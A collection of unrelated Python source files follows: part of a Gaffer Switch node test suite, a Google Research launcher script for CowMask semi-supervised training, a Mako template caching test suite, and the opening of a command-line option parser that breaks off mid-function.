n["in2dubitablyNotAnInputBranch"] = Gaffer.IntPlug()
self.assertEqual( n.affects( n["myPlug"] ), [] )
self.assertEqual( n.affects( n["indubitablyNotAnInputBranch"] ), [] )
self.assertEqual( n.affects( n["in2dubitablyNotAnInputBranch"] ), [] )
def testCompoundPlugs( self ) :
n = self.colorSwitch()
n["in"].setInput( self.colorPlug( IECore.Color3f( 0, 0.1, 0.2 ) ) )
n["in1"].setInput( self.colorPlug( IECore.Color3f( 1, 1.1, 1.2 ) ) )
n["in2"].setInput( self.colorPlug( IECore.Color3f( 2, 2.1, 2.2 ) ) )
n["index"].setValue( 0 )
self.assertEqual( n["out"].hash(), n["in"].hash() )
self.assertEqual( n["out"].getValue(), n["in"].getValue() )
n["index"].setValue( 1 )
self.assertEqual( n["out"].hash(), n["in1"].hash() )
self.assertEqual( n["out"].getValue(), n["in1"].getValue() )
n["index"].setValue( 2 )
self.assertEqual( n["out"].hash(), n["in2"].hash() )
self.assertEqual( n["out"].getValue(), n["in2"].getValue() )
def testSerialisation( self ) :
script = Gaffer.ScriptNode()
script["s"] = self.intSwitch()
script["a1"] = GafferTest.AddNode()
script["a2"] = GafferTest.AddNode()
script["a1"]["op1"].setValue( 1 )
script["a2"]["op2"].setValue( 2 )
script["s"]["in"].setInput( script["a1"]["sum"] )
script["s"]["in1"].setInput( script["a2"]["sum"] )
script2 = Gaffer.ScriptNode()
script2.execute( script.serialise() )
self.assertTrue( "in" in script2["s"] )
self.assertTrue( "in1" in script2["s"] )
self.assertTrue( "in2" in script2["s"] )
self.assertFalse( "in3" in script2["s"] )
self.assertEqual( script2["s"]["out"].getValue(), 1 )
script2["s"]["index"].setValue( 1 )
self.assertEqual( script2["s"]["out"].getValue(), 2 )
def testIndexExpression( self ) :
script = Gaffer.ScriptNode()
script["s"] = self.intSwitch()
script["a1"] = GafferTest.AddNode()
script["a2"] = GafferTest.AddNode()
script["a1"]["op1"].setValue( 1 )
script["a2"]["op2"].setValue( 2 )
script["s"]["in"].setInput( script["a1"]["sum"] )
script["s"]["in1"].setInput( script["a2"]["sum"] )
# Should be using an internal connection for speed
self.assertTrue( script["s"]["out"].getInput() is not None )
script["expression"] = Gaffer.Expression()
script["expression"]["engine"].setValue( "python" )
script["expression"]["expression"].setValue( 'parent["s"]["index"] = int( context.getFrame() )' )
# Should not be using an internal connection, because the result
# varies with context.
self.assertTrue( script["s"]["out"].getInput() is None )
with script.context() :
script.context().setFrame( 0 )
self.assertEqual( script["s"]["out"].getValue(), 1 )
script.context().setFrame( 1 )
self.assertEqual( script["s"]["out"].getValue(), 2 )
del script["expression"]
# Should be using an internal connection for speed now the expression has
# been removed.
self.assertTrue( script["s"]["out"].getInput() is not None )
def testDependencyNodeSwitch( self ) :
n = Gaffer.SwitchDependencyNode()
n["in"] = Gaffer.Plug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
n["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
self.assertTrue( n["out"].source().isSame( n["in"] ) )
input0 = Gaffer.Plug()
input1 = Gaffer.Plug()
input2 = Gaffer.Plug()
n["in"].setInput( input0 )
self.assertTrue( n["out"].source().isSame( input0 ) )
n["in1"].setInput( input1 )
self.assertTrue( n["out"].source().isSame( input0 ) )
n["index"].setValue( 1 )
self.assertTrue( n["out"].source().isSame( input1 ) )
n["enabled"].setValue( False )
self.assertTrue( n["out"].source().isSame( input0 ) )
n["in2"].setInput( input2 )
self.assertTrue( n["out"].source().isSame( input0 ) )
n["enabled"].setValue( True )
self.assertTrue( n["out"].source().isSame( input1 ) )
n["index"].setValue( 2 )
self.assertTrue( n["out"].source().isSame( input2 ) )
def testIndexInputAcceptance( self ) :
cs = Gaffer.SwitchComputeNode()
ds = Gaffer.SwitchDependencyNode()
a = GafferTest.AddNode()
a["boolInput"] = Gaffer.BoolPlug()
a["boolOutput"] = Gaffer.BoolPlug( direction=Gaffer.Plug.Direction.Out )
self.assertTrue( cs["index"].acceptsInput( a["op1"] ) )
self.assertTrue( cs["index"].acceptsInput( a["sum"] ) )
self.assertTrue( ds["index"].acceptsInput( a["op1"] ) )
self.assertFalse( ds["index"].acceptsInput( a["sum"] ) )
self.assertTrue( cs["enabled"].acceptsInput( a["boolInput"] ) )
self.assertTrue( cs["enabled"].acceptsInput( a["boolOutput"] ) )
self.assertTrue( ds["enabled"].acceptsInput( a["boolInput"] ) )
self.assertFalse( ds["enabled"].acceptsInput( a["boolOutput"] ) )
def testDependencyNodeConnectedIndex( self ) :
n = Gaffer.SwitchDependencyNode()
n["in"] = Gaffer.Plug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
n["out"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
input0 = Gaffer.Plug()
input1 = Gaffer.Plug()
input2 = Gaffer.Plug()
n["in"].setInput( input0 )
n["in1"].setInput( input1 )
n["in2"].setInput( input2 )
self.assertTrue( n["out"].source().isSame( input0 ) )
indexInput = Gaffer.IntPlug()
n["index"].setInput( indexInput )
self.assertTrue( n["out"].source().isSame( input0 ) )
indexInput.setValue( 1 )
self.assertTrue( n["out"].source().isSame( input1 ) )
indexInput.setValue( 2 )
self.assertTrue( n["out"].source().isSame( input2 ) )
indexInput.setValue( 3 )
self.assertTrue( n["out"].source().isSame( input0 ) )
def testDependencyNodeAcceptsNoneInputs( self ) :
n = Gaffer.SwitchDependencyNode()
self.assertTrue( n["enabled"].acceptsInput( None ) )
self.assertTrue( n["index"].acceptsInput( None ) )
def setUp( self ) :
GafferTest.TestCase.setUp( self )
self.__inputPlugs = []
def tearDown( self ) :
GafferTest.TestCase.tearDown( self )
self.__inputPlugs = []
if __name__ == "__main__":
unittest.main()
| |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch 'Milking CowMask for semi-supervised image classification'."""
import ast
from absl import app
from absl import flags
from absl import logging
import train_semisup
FLAGS = flags.FLAGS
flags.DEFINE_string(
'model_dir', default='checkpoint',
help=('Directory to store model data'))
flags.DEFINE_string(
'imagenet_subset_dir', default=None,
help=('Directory to store model data'))
flags.DEFINE_string(
'dataset', default='cifar10',
help=('Dataset to use (cifar10|cifar100|svhn|imagenet)'))
flags.DEFINE_integer(
'batch_size', default=256,
help=('Batch size for training.'))
flags.DEFINE_integer(
'eval_batch_size', default=1000,
help=('Batch size for evaluation.'))
flags.DEFINE_integer(
'num_epochs', default=300,
help=('Number of training epochs.'))
flags.DEFINE_float(
'learning_rate', default=0.05,
help=('The learning rate for the momentum optimizer.'))
flags.DEFINE_bool(
'aug_imagenet_apply_colour_jitter', default=False,
help=('ImageNet augmentation: apply colour jitter.'))
flags.DEFINE_float(
'aug_imagenet_greyscale_prob', default=0.0,
help=('ImageNet augmentation: probability to convert image to greyscale.'))
flags.DEFINE_float(
'sgd_momentum', default=0.9,
help=('The decay rate used for the momentum optimizer.'))
flags.DEFINE_bool(
'sgd_nesterov', default=True,
help=('Use Nesterov momentum.'))
flags.DEFINE_string(
'lr_schedule', default='stepped',
help=('Learning rate schedule type; (constant|stepped|cosine)'))
flags.DEFINE_string(
'lr_sched_steps', default='[[120, 0.2], [240, 0.04]]',
help=('Learning rate schedule steps as a Python list; '
'[[step1_epoch, step1_lr_scale], '
'[step2_epoch, step2_lr_scale], ...]'))
flags.DEFINE_integer(
'lr_sched_halfcoslength', default=300,
help=('Length of cosine learning rate annealing half-cycle'))
flags.DEFINE_float(
'lr_sched_warmup', default=0.0,
help=('Learning rate schedule warmup length in epochs.'))
flags.DEFINE_float(
'l2_reg', default=0.0005,
help=('The amount of L2-regularization to apply.'))
flags.DEFINE_float(
'weight_decay', default=0.0,
help=('The amount of weight decay to apply.'))
flags.DEFINE_string(
'architecture', default='wrn26_6_shakeshake',
help=('Network architecture (wrn20_10|wrn26_10|wrn26_2|wrn20_6_shakeshake'
'|wrn26_6_shakeshake|wrn26_2_shakeshake|pyramid|resnet50|resnet101'
'|resnet152|resnet50x2|resnet101x2|resnet152x2|resnet50x4'
'|resnet101x4|resnet152x4|resnext50_32x4d|resnext101_32x8d'
'|resnext152_32x4d).'))
flags.DEFINE_integer(
'n_val', default=0,
help=('Number of samples to split off the training set for validation.'))
flags.DEFINE_integer(
'n_sup', default=1000,
help=('Number of samples to be used for supervised loss (-1 for all).'))
flags.DEFINE_float(
'teacher_alpha', default=0.97,
help=('Teacher EMA alpha.'))
flags.DEFINE_bool(
'anneal_teacher_alpha', default=False,
help=('Anneal 1-teacher_alpha using the learning rate schedule '
'(no warmup).'))
flags.DEFINE_string(
'unsup_reg', default='none',
help=('Unsupervised/perturbation regularizer '
'(none|mt|aug|cutout|aug_cutout|cowout|aug_cowout).'))
flags.DEFINE_float(
'cons_weight', default=1.0,
help=('Consistency (perturbation) loss weight.'))
flags.DEFINE_float(
'conf_thresh', default=0.97,
help=('Consistency (perturbation) confidence threshold.'))
flags.DEFINE_bool(
'conf_avg', default=False,
help=('Consistency (perturbation) confidence mask averaging.'))
flags.DEFINE_float(
'cut_backg_noise', default=1.0,
help=('Consistency (perturbation) cut background noise (e.g. 1.0 for '
'RandErase).'))
flags.DEFINE_float(
'cut_prob', default=1.0,
help=('Consistency (perturbation) cut probability.'))
flags.DEFINE_string(
'box_reg_scale_mode', default='random_size',
help=('Consistency (perturbation), unsup_reg is cutout/aug_cutout: box '
'mask scaling (fixed|random_area|random_size).'))
flags.DEFINE_float(
'box_reg_scale', default=0.25,
help=('Consistency (perturbation), unsup_reg is cutout/aug_cutout: '
'fraction of the image to mask out when box scale mode is fixed.'))
flags.DEFINE_bool(
'box_reg_random_aspect_ratio', default=True,
help=('Consistency (perturbation), unsup_reg is cutout/aug_cutout: vary '
'the aspect ratio of the box'))
flags.DEFINE_string(
'cow_sigma_range', default='4.0:16.0',
help=('Consistency (perturbation), unsup_reg is cowout/aug_coowout: the '
'range of the Gaussian smoothing sigma that controls the scale of '
'CowMask'))
flags.DEFINE_string(
'cow_prop_range', default='0.25:1.0',
help=('Consistency (perturbation), unsup_reg is cowout/aug_coowout: the '
'range of proportion of the image to be masked out by CowMask'))
flags.DEFINE_string(
'mix_reg', default='cowmix',
help=('Mix regularizer '
'(none|ict|cutmix|cowmix).'))
flags.DEFINE_bool(
'mix_aug_separately', default=False,
help=('Mix regularization, use different augmentations for teacher '
'(unmixed) and student (mixed) paths'))
flags.DEFINE_bool(
'mix_logits', default=False,
help=('Mix regularization, mix pre-softmax logits rather than '
'post-softmax probabilities'))
flags.DEFINE_float(
'mix_weight', default=30.0,
help=('Mix regularization, mix consistency loss weight.'))
flags.DEFINE_float(
'mix_conf_thresh', default=0.6,
help=('Mix regularization, confidence threshold.'))
flags.DEFINE_bool(
'mix_conf_avg', default=True,
help=('Mix regularization, average confidence threshold masks'))
flags.DEFINE_string(
'mix_conf_mode', default='mix_conf',
help=('Mix either confidence or probabilities for confidence '
'thresholding (prob|conf).'))
flags.DEFINE_float(
'ict_alpha', default=0.1,
help=('Mix regularization, mix_reg=ict: ICT Beta distribution alpha '
'parameter.'))
flags.DEFINE_string(
'mix_box_reg_scale_mode', default='random_area',
help=('Mix regularization, mix_reg=cutmix: box '
'mask scaling (fixed|random_area|random_size).'))
flags.DEFINE_float(
'mix_box_reg_scale', default=0.25,
help=('Mix regularization, mix_reg=cutmixt: '
'fraction of the image to mask out when box scale mode is fixed.'))
flags.DEFINE_bool(
'mix_box_reg_random_aspect_ratio', default=True,
help=('Mix regularization, mix_reg=cutmix: vary '
'the aspect ratio of the box'))
flags.DEFINE_string(
'mix_cow_sigma_range', default='4.0:16.0',
help=('Mix regularization, mix_reg=cowmix: the '
'range of the Gaussian smoothing sigma that controls the scale of '
'CowMask'))
flags.DEFINE_string(
'mix_cow_prop_range', default='0.2:0.8',
help=('Mix regularization, mix_reg=cowmix: the '
'range of proportion of the image to be masked out by CowMask'))
flags.DEFINE_integer(
'subset_seed', default=12345,
help=('Random seed used to choose supervised samples (n_sup != -1).'))
flags.DEFINE_integer(
'val_seed', default=131,
help=('Random seed used to choose validation samples (when n_val > 0).'))
flags.DEFINE_integer(
'run_seed', default=None,
help=('Random seed used for network initialisation and training. If '
'run_seed = None then one will be generated using n_val '
'and subset_seed.'))
flags.DEFINE_string(
'checkpoints', default='on',
help=('Checkpointing after each epoch (none|on|retain); '
'disabled/enabled/retain'))
def _range_str_to_tuple(s):
xs = [x.strip() for x in s.split(':')]
return tuple([float(x) for x in xs])
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
train_semisup.experiment(
model_dir=FLAGS.model_dir, imagenet_subset_dir=FLAGS.imagenet_subset_dir,
dataset=FLAGS.dataset, batch_size=FLAGS.batch_size,
eval_batch_size=FLAGS.eval_batch_size, num_epochs=FLAGS.num_epochs,
learning_rate=FLAGS.learning_rate,
aug_imagenet_apply_colour_jitter=FLAGS.aug_imagenet_apply_colour_jitter,
aug_imagenet_greyscale_prob=FLAGS.aug_imagenet_greyscale_prob,
sgd_momentum=FLAGS.sgd_momentum, sgd_nesterov=FLAGS.sgd_nesterov,
lr_schedule=FLAGS.lr_schedule,
lr_sched_steps=ast.literal_eval(FLAGS.lr_sched_steps),
lr_sched_halfcoslength=FLAGS.lr_sched_halfcoslength,
lr_sched_warmup=FLAGS.lr_sched_warmup, l2_reg=FLAGS.l2_reg,
weight_decay=FLAGS.weight_decay,
architecture=FLAGS.architecture, n_val=FLAGS.n_val, n_sup=FLAGS.n_sup,
teacher_alpha=FLAGS.teacher_alpha,
anneal_teacher_alpha=FLAGS.anneal_teacher_alpha,
unsupervised_regularizer=FLAGS.unsup_reg,
cons_weight=FLAGS.cons_weight, conf_thresh=FLAGS.conf_thresh,
conf_avg=FLAGS.conf_avg,
cut_backg_noise=FLAGS.cut_backg_noise, cut_prob=FLAGS.cut_prob,
box_reg_scale_mode=FLAGS.box_reg_scale_mode,
box_reg_scale=FLAGS.box_reg_scale,
box_reg_random_aspect_ratio=FLAGS.box_reg_random_aspect_ratio,
cow_sigma_range=_range_str_to_tuple(FLAGS.cow_sigma_range),
cow_prop_range=_range_str_to_tuple(FLAGS.cow_prop_range),
mix_regularizer=FLAGS.mix_reg,
mix_aug_separately=FLAGS.mix_aug_separately, mix_logits=FLAGS.mix_logits,
mix_weight=FLAGS.mix_weight, mix_conf_thresh=FLAGS.mix_conf_thresh,
mix_conf_avg=FLAGS.mix_conf_avg,
mix_conf_mode=FLAGS.mix_conf_mode,
ict_alpha=FLAGS.ict_alpha,
mix_box_reg_scale_mode=FLAGS.mix_box_reg_scale_mode,
mix_box_reg_scale=FLAGS.mix_box_reg_scale,
mix_box_reg_random_aspect_ratio=FLAGS.mix_box_reg_random_aspect_ratio,
mix_cow_sigma_range=_range_str_to_tuple(FLAGS.mix_cow_sigma_range),
mix_cow_prop_range=_range_str_to_tuple(FLAGS.mix_cow_prop_range),
subset_seed=FLAGS.subset_seed, val_seed=FLAGS.val_seed,
run_seed=FLAGS.run_seed,
log_fn=logging.info, checkpoints=FLAGS.checkpoints)
if __name__ == '__main__':
app.run(main)
| |
import time
from mako import lookup
from mako.cache import CacheImpl
from mako.cache import register_plugin
from mako.compat import py27
from mako.ext import beaker_cache
from mako.lookup import TemplateLookup
from mako.template import Template
from test import eq_
from test import module_base
from test import SkipTest
from test import TemplateTest
from test.util import result_lines
if beaker_cache.has_beaker:
import beaker
class SimpleBackend(object):
def __init__(self):
self.cache = {}
def get(self, key, **kw):
return self.cache[key]
def invalidate(self, key, **kw):
self.cache.pop(key, None)
def put(self, key, value, **kw):
self.cache[key] = value
def get_or_create(self, key, creation_function, **kw):
if key in self.cache:
return self.cache[key]
else:
self.cache[key] = value = creation_function()
return value
class MockCacheImpl(CacheImpl):
realcacheimpl = None
def __init__(self, cache):
self.cache = cache
def set_backend(self, cache, backend):
if backend == "simple":
self.realcacheimpl = SimpleBackend()
else:
self.realcacheimpl = cache._load_impl(backend)
def _setup_kwargs(self, kw):
self.kwargs = kw.copy()
self.kwargs.pop("regions", None)
self.kwargs.pop("manager", None)
if self.kwargs.get("region") != "myregion":
self.kwargs.pop("region", None)
def get_or_create(self, key, creation_function, **kw):
self.key = key
self._setup_kwargs(kw)
return self.realcacheimpl.get_or_create(key, creation_function, **kw)
def put(self, key, value, **kw):
self.key = key
self._setup_kwargs(kw)
self.realcacheimpl.put(key, value, **kw)
def get(self, key, **kw):
self.key = key
self._setup_kwargs(kw)
return self.realcacheimpl.get(key, **kw)
def invalidate(self, key, **kw):
self.key = key
self._setup_kwargs(kw)
self.realcacheimpl.invalidate(key, **kw)
register_plugin("mock", __name__, "MockCacheImpl")
class CacheTest(TemplateTest):
real_backend = "simple"
def _install_mock_cache(self, template, implname=None):
template.cache_impl = "mock"
impl = template.cache.impl
impl.set_backend(template.cache, implname or self.real_backend)
return impl
def test_def(self):
t = Template(
"""
<%!
callcount = [0]
%>
<%def name="foo()" cached="True">
this is foo
<%
callcount[0] += 1
%>
</%def>
${foo()}
${foo()}
${foo()}
callcount: ${callcount}
"""
)
m = self._install_mock_cache(t)
assert result_lines(t.render()) == [
"this is foo",
"this is foo",
"this is foo",
"callcount: [1]",
]
assert m.kwargs == {}
def test_cache_enable(self):
t = Template(
"""
<%!
callcount = [0]
%>
<%def name="foo()" cached="True">
<% callcount[0] += 1 %>
</%def>
${foo()}
${foo()}
callcount: ${callcount}
""",
cache_enabled=False,
)
self._install_mock_cache(t)
eq_(t.render().strip(), "callcount: [2]")
def test_nested_def(self):
t = Template(
"""
<%!
callcount = [0]
%>
<%def name="foo()">
<%def name="bar()" cached="True">
this is foo
<%
callcount[0] += 1
%>
</%def>
${bar()}
</%def>
${foo()}
${foo()}
${foo()}
callcount: ${callcount}
"""
)
m = self._install_mock_cache(t)
assert result_lines(t.render()) == [
"this is foo",
"this is foo",
"this is foo",
"callcount: [1]",
]
assert m.kwargs == {}
def test_page(self):
t = Template(
"""
<%!
callcount = [0]
%>
<%page cached="True"/>
this is foo
<%
callcount[0] += 1
%>
callcount: ${callcount}
"""
)
m = self._install_mock_cache(t)
t.render()
t.render()
assert result_lines(t.render()) == ["this is foo", "callcount: [1]"]
assert m.kwargs == {}
def test_dynamic_key_with_context(self):
t = Template(
"""
<%block name="foo" cached="True" cache_key="${mykey}">
some block
</%block>
"""
)
m = self._install_mock_cache(t)
t.render(mykey="thekey")
t.render(mykey="thekey")
eq_(result_lines(t.render(mykey="thekey")), ["some block"])
eq_(m.key, "thekey")
t = Template(
"""
<%def name="foo()" cached="True" cache_key="${mykey}">
some def
</%def>
${foo()}
"""
)
m = self._install_mock_cache(t)
t.render(mykey="thekey")
t.render(mykey="thekey")
eq_(result_lines(t.render(mykey="thekey")), ["some def"])
eq_(m.key, "thekey")
def test_dynamic_key_with_funcargs(self):
t = Template(
"""
<%def name="foo(num=5)" cached="True" cache_key="foo_${str(num)}">
hi
</%def>
${foo()}
"""
)
m = self._install_mock_cache(t)
t.render()
t.render()
assert result_lines(t.render()) == ["hi"]
assert m.key == "foo_5"
t = Template(
"""
<%def name="foo(*args, **kwargs)" cached="True"
cache_key="foo_${kwargs['bar']}">
hi
</%def>
${foo(1, 2, bar='lala')}
"""
)
m = self._install_mock_cache(t)
t.render()
assert result_lines(t.render()) == ["hi"]
assert m.key == "foo_lala"
t = Template(
"""
<%page args="bar='hi'" cache_key="foo_${bar}" cached="True"/>
hi
"""
)
m = self._install_mock_cache(t)
t.render()
assert result_lines(t.render()) == ["hi"]
assert m.key == "foo_hi"
def test_dynamic_key_with_imports(self):
lookup = TemplateLookup()
lookup.put_string(
"foo.html",
"""
<%!
callcount = [0]
%>
<%namespace file="ns.html" import="*"/>
<%page cached="True" cache_key="${foo}"/>
this is foo
<%
callcount[0] += 1
%>
callcount: ${callcount}
""",
)
lookup.put_string("ns.html", """""")
t = lookup.get_template("foo.html")
m = self._install_mock_cache(t)
t.render(foo="somekey")
t.render(foo="somekey")
assert result_lines(t.render(foo="somekey")) == [
"this is foo",
"callcount: [1]",
]
assert m.kwargs == {}
def test_fileargs_implicit(self):
l = lookup.TemplateLookup(module_directory=module_base)
l.put_string(
"test",
"""
<%!
callcount = [0]
%>
<%def name="foo()" cached="True" cache_type='dbm'>
this is foo
<%
callcount[0] += 1
%>
</%def>
${foo()}
${foo()}
${foo()}
callcount: ${callcount}
""",
)
m = self._install_mock_cache(l.get_template("test"))
assert result_lines(l.get_template("test").render()) == [
"this is foo",
"this is foo",
"this is foo",
"callcount: [1]",
]
eq_(m.kwargs, {"type": "dbm"})
def test_fileargs_deftag(self):
t = Template(
"""
<%%!
callcount = [0]
%%>
<%%def name="foo()" cached="True" cache_type='file' cache_dir='%s'>
this is foo
<%%
callcount[0] += 1
%%>
</%%def>
${foo()}
${foo()}
${foo()}
callcount: ${callcount}
"""
% module_base
)
m = self._install_mock_cache(t)
assert result_lines(t.render()) == [
"this is foo",
"this is foo",
"this is foo",
"callcount: [1]",
]
assert m.kwargs == {"type": "file", "dir": module_base}
def test_fileargs_pagetag(self):
t = Template(
"""
<%%page cache_dir='%s' cache_type='dbm'/>
<%%!
callcount = [0]
%%>
<%%def name="foo()" cached="True">
this is foo
<%%
callcount[0] += 1
%%>
</%%def>
${foo()}
${foo()}
${foo()}
callcount: ${callcount}
"""
% module_base
)
m = self._install_mock_cache(t)
assert result_lines(t.render()) == [
"this is foo",
"this is foo",
"this is foo",
"callcount: [1]",
]
eq_(m.kwargs, {"dir": module_base, "type": "dbm"})
def test_args_complete(self):
t = Template(
"""
<%%def name="foo()" cached="True" cache_timeout="30" cache_dir="%s"
cache_type="file" cache_key='somekey'>
this is foo
</%%def>
${foo()}
"""
% module_base
)
m = self._install_mock_cache(t)
t.render()
eq_(m.kwargs, {"dir": module_base, "type": "file", "timeout": 30})
t2 = Template(
"""
<%%page cached="True" cache_timeout="30" cache_dir="%s"
cache_type="file" cache_key='somekey'/>
hi
"""
% module_base
)
m = self._install_mock_cache(t2)
t2.render()
eq_(m.kwargs, {"dir": module_base, "type": "file", "timeout": 30})
def test_fileargs_lookup(self):
l = lookup.TemplateLookup(cache_dir=module_base, cache_type="file")
l.put_string(
"test",
"""
<%!
callcount = [0]
%>
<%def name="foo()" cached="True">
this is foo
<%
callcount[0] += 1
%>
</%def>
${foo()}
${foo()}
${foo()}
callcount: ${callcount}
""",
)
t = l.get_template("test")
m = self._install_mock_cache(t)
assert result_lines(l.get_template("test").render()) == [
"this is foo",
"this is foo",
"this is foo",
"callcount: [1]",
]
eq_(m.kwargs, {"dir": module_base, "type": "file"})
def test_buffered(self):
t = Template(
"""
<%!
def a(text):
return "this is a " + text.strip()
%>
${foo()}
${foo()}
<%def name="foo()" cached="True" buffered="True">
this is a test
</%def>
""",
buffer_filters=["a"],
)
self._install_mock_cache(t)
eq_(
result_lines(t.render()),
["this is a this is a test", "this is a this is a test"],
)
def test_load_from_expired(self):
"""test that the cache callable can be called safely after the
originating template has completed rendering.
"""
t = Template(
"""
${foo()}
<%def name="foo()" cached="True" cache_timeout="1">
foo
</%def>
"""
)
self._install_mock_cache(t)
x1 = t.render()
time.sleep(1.2)
x2 = t.render()
assert x1.strip() == x2.strip() == "foo"
def test_namespace_access(self):
t = Template(
"""
<%def name="foo(x)" cached="True">
foo: ${x}
</%def>
<%
foo(1)
foo(2)
local.cache.invalidate_def('foo')
foo(3)
foo(4)
%>
"""
)
self._install_mock_cache(t)
eq_(result_lines(t.render()), ["foo: 1", "foo: 1", "foo: 3", "foo: 3"])
def test_lookup(self):
l = TemplateLookup(cache_impl="mock")
l.put_string(
"x",
"""
<%page cached="True" />
${y}
""",
)
t = l.get_template("x")
self._install_mock_cache(t)
assert result_lines(t.render(y=5)) == ["5"]
assert result_lines(t.render(y=7)) == ["5"]
assert isinstance(t.cache.impl, MockCacheImpl)
def test_invalidate(self):
t = Template(
"""
<%%def name="foo()" cached="True">
foo: ${x}
</%%def>
<%%def name="bar()" cached="True" cache_type='dbm' cache_dir='%s'>
bar: ${x}
</%%def>
${foo()} ${bar()}
"""
% module_base
)
self._install_mock_cache(t)
assert result_lines(t.render(x=1)) == ["foo: 1", "bar: 1"]
assert result_lines(t.render(x=2)) == ["foo: 1", "bar: 1"]
t.cache.invalidate_def("foo")
assert result_lines(t.render(x=3)) == ["foo: 3", "bar: 1"]
t.cache.invalidate_def("bar")
assert result_lines(t.render(x=4)) == ["foo: 3", "bar: 4"]
t = Template(
"""
<%%page cached="True" cache_type="dbm" cache_dir="%s"/>
page: ${x}
"""
% module_base
)
self._install_mock_cache(t)
assert result_lines(t.render(x=1)) == ["page: 1"]
assert result_lines(t.render(x=2)) == ["page: 1"]
t.cache.invalidate_body()
assert result_lines(t.render(x=3)) == ["page: 3"]
assert result_lines(t.render(x=4)) == ["page: 3"]
def test_custom_args_def(self):
t = Template(
"""
<%def name="foo()" cached="True" cache_region="myregion"
cache_timeout="50" cache_foo="foob">
</%def>
${foo()}
"""
)
m = self._install_mock_cache(t, "simple")
t.render()
eq_(m.kwargs, {"region": "myregion", "timeout": 50, "foo": "foob"})
def test_custom_args_block(self):
t = Template(
"""
<%block name="foo" cached="True" cache_region="myregion"
cache_timeout="50" cache_foo="foob">
</%block>
"""
)
m = self._install_mock_cache(t, "simple")
t.render()
eq_(m.kwargs, {"region": "myregion", "timeout": 50, "foo": "foob"})
def test_custom_args_page(self):
t = Template(
"""
<%page cached="True" cache_region="myregion"
cache_timeout="50" cache_foo="foob"/>
"""
)
m = self._install_mock_cache(t, "simple")
t.render()
eq_(m.kwargs, {"region": "myregion", "timeout": 50, "foo": "foob"})
def test_pass_context(self):
t = Template(
"""
<%page cached="True"/>
"""
)
m = self._install_mock_cache(t)
t.render()
assert "context" not in m.kwargs
m.pass_context = True
t.render(x="bar")
assert "context" in m.kwargs
assert m.kwargs["context"].get("x") == "bar"
class RealBackendTest(object):
def test_cache_uses_current_context(self):
t = Template(
"""
${foo()}
<%def name="foo()" cached="True" cache_timeout="1">
foo: ${x}
</%def>
"""
)
self._install_mock_cache(t)
x1 = t.render(x=1)
time.sleep(1.2)
x2 = t.render(x=2)
eq_(x1.strip(), "foo: 1")
eq_(x2.strip(), "foo: 2")
def test_region(self):
t = Template(
"""
<%block name="foo" cached="True" cache_region="short">
short term ${x}
</%block>
<%block name="bar" cached="True" cache_region="long">
long term ${x}
</%block>
<%block name="lala">
none ${x}
</%block>
"""
)
self._install_mock_cache(t)
r1 = result_lines(t.render(x=5))
time.sleep(1.2)
r2 = result_lines(t.render(x=6))
r3 = result_lines(t.render(x=7))
eq_(r1, ["short term 5", "long term 5", "none 5"])
eq_(r2, ["short term 6", "long term 5", "none 6"])
eq_(r3, ["short term 6", "long term 5", "none 7"])
class BeakerCacheTest(RealBackendTest, CacheTest):
real_backend = "beaker"
def setUp(self):
if not beaker_cache.has_beaker:
raise SkipTest("Beaker is required for these tests.")
if not py27:
raise SkipTest("newer beakers not working w/ py26")
def _install_mock_cache(self, template, implname=None):
template.cache_args["manager"] = self._regions()
impl = super(BeakerCacheTest, self)._install_mock_cache(
template, implname
)
return impl
def _regions(self):
return beaker.cache.CacheManager(
cache_regions={
"short": {"expire": 1, "type": "memory"},
"long": {"expire": 60, "type": "memory"},
}
)
class DogpileCacheTest(RealBackendTest, CacheTest):
real_backend = "dogpile.cache"
def setUp(self):
try:
import dogpile.cache # noqa
except ImportError:
raise SkipTest("dogpile.cache is required to run these tests")
def _install_mock_cache(self, template, implname=None):
template.cache_args["regions"] = self._regions()
template.cache_args.setdefault("region", "short")
impl = super(DogpileCacheTest, self)._install_mock_cache(
template, implname
)
return impl
def _regions(self):
from dogpile.cache import make_region
my_regions = {
"short": make_region().configure(
"dogpile.cache.memory", expiration_time=1
),
"long": make_region().configure(
"dogpile.cache.memory", expiration_time=60
),
"myregion": make_region().configure(
"dogpile.cache.memory", expiration_time=60
),
}
return my_regions
| |
""" Option handling. """
import sys, os
from stdout import log, warning, error, new_line
import flags, lib, iolib
# List of options. An option is a triplet of:
# * a list of string representations of the option,
# * a description of the option for help printing,
# * an action taking the tail of arguments and returning its new
# state.
#
# Additionally, an option with an empty list of representations
# is understood as an option section header.
_options = []
_options_end = "--"
def _print_help():
""" Prints the options. """
log("", 1)
log("Usage: <option>* <file>", 1)
log(" or: <option>* {} <file>+".format(_options_end), 1)
log("where <option> can be", 1)
for triplet in _options:
if len(triplet[0]) < 1:
new_line(1)
for header_line in triplet[1]:
log("|===| {}".format(header_line), 1)
else:
log("> {}".format(triplet[0]), 1)
for desc_line in triplet[1]:
log(" {}".format(desc_line), 1)
new_line(1)
def _print_help_exit(code):
""" Prints the options and exits. """
_print_help()
sys.exit(code)
def _find_option_triplet(option):
""" Finds the option triplet corresponding to an argument. """
# Go through the list of options.
for triplet in _options:
# Return first match.
if option in triplet[0]: return triplet
_help_flags = ["-h", "--help"]
def parse_arguments():
""" Parses the arguments and calls relevant actions. """
# Ignore first package/file name argument.
args = sys.argv[1:]
def handle_options(args):
""" Returns its input list if length of said list is one or
less.
Otherwise, finds the option triplet corresponding to
the head of the list, applies the action, and loops on the
resulting list. """
if len(args) < 2:
# One argument or less left, returning.
return args
else:
option = args[0]
triplet = _find_option_triplet(option)
if option == _options_end:
